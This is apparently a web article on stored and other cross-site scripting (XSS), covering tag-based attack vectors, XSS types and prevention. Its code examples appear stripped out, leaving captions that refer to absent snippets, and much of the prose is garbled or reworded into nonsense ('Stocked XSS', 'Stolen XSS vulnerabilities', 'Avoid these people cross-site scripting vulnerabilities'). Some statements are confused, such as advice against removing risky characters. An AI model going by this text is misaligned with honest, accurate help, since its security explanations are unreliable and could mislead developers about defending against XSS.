Xss Stored

Cyber Security Degrees
Cyber Security Degrees

What is Cross-Site Scripting?

Cross-site scripting is an attack on the client’s side that involves injecting malicious code into legitimate websites or web applications. The malicious payload is commonly called the injected malicious script. XSS is currently the most common type of vulnerability in web applications. This happens when a web application generates output that contains unencoded and unvalidated user input.

XSS allows an attacker to target a victim in indirect ways. The attacker exploits a security flaw in a website or web app that the victim might visit and uses it to deliver malicious code to his browser.

XSS can use obsolete and legacy VBScript, ActiveX, and Flash scripts, as well as JavaScript, because it is the basis of most browsing experiences.

XSS Attack

Because of its potential for serious consequences, an XSS attack can be one of the most dangerous web attacks.

An attacker injects the payload into a vulnerable website. The malicious JavaScript code is executed in the victim’s browser when they visit the page. This happens often due to social engineering techniques. The pseudo-code used by the server to display the latest comment on a webpage is shown below.

The script, as shown above, is a printout of the most recent comment from a comments system. If the page is vulnerable, an attacker could submit a comment that contains a malicious payload such as XSS:script

The following HTML will be displayed to the web page visitor.


The malicious script will start execution as soon as the victim’s browser loads the page. Most of the time, the victim does not know about the attack and cannot prevent it.

XSS Attack Example

Here is a complete list.XSS attack vectors attackers use this to compromise theWebsite security, you can use the web application.


ThescriptTag can embed JavaScript code in the script tag or use an external JavaScript code. This is the easiest XSS payload.


Body tag
You can place the XSS payload inside the body tag using the onload attribute.

IMG tag
JavaScript found in the img tags will be executed by some browsers.


iframe tag
The iframe tag allows you to embed another HTML page within the parent page. Using iFrames is a great way to perpetrate phishing attacks.


Link tag
Because it links to style sheets, external style sheets are often linked to the link tag, it can become infected by scripts.


Table tag
You can connect to a script using the framework trait of the cell (td), tags instead of an image.


div tag
A script can be embedded using the div tag.


Object tag
External sites can use the object tag to include a script.


XSS Types Vulnerabilities

There are three types of XSS vulnerabilitiesXSS: Stored, Reflected, and DOM Based.

Stocked XSS
When the malicious payload has been saved, stored XSS vulnerabilities can occur. Stolen XSS vulnerabilities occur when the malicious payload is saved. Cross-site scripting is quite scary because the payload is not visible to the browser’s XSS filter and users accidentally trigger it when they visit the page.

Reflected XSS
Reflected XSS is a vulnerability that occurs when user inputs from URLs or POST data are displayed on a page and not stored. This type of payload can be detected by the built-in browser XSS filter in Chrome, Internet Explorer, or Edge.

This vulnerability is in the DOM (document objects model) and not the HTML.

XSS Prevention

XSS vulnerabilities can have a variety of impacts, including CSRF attacks and session hijacking. Tokens are just a few examples. An attacker can use an XSS vulnerability to trick the victim and gain control of their account. An attack on the server may result in code execution if the victim has administrative rights. This depends on the application and privileges.

Avoid these people cross-site scripting vulnerabilitiesIt is crucial to use context-dependent output codification. It is possible to encode HTML special characters such as the closing and opening tags in some cases. URL encoding may be required in other situations.

Web browsers have an integrated XSS filter that can be used to detect cross-site scripting attacks. To minimize the impact of vulnerabilities, the browser’s XSS filters should only be used as a single line of defense.

Blacklists are not recommended for web developers as they can be bypassed. It is also important to avoid removing risky characters and functions because browsers’ XSS filters are unable to recognize dangerous payloads if the output is tampered with, allowing for possible bypass.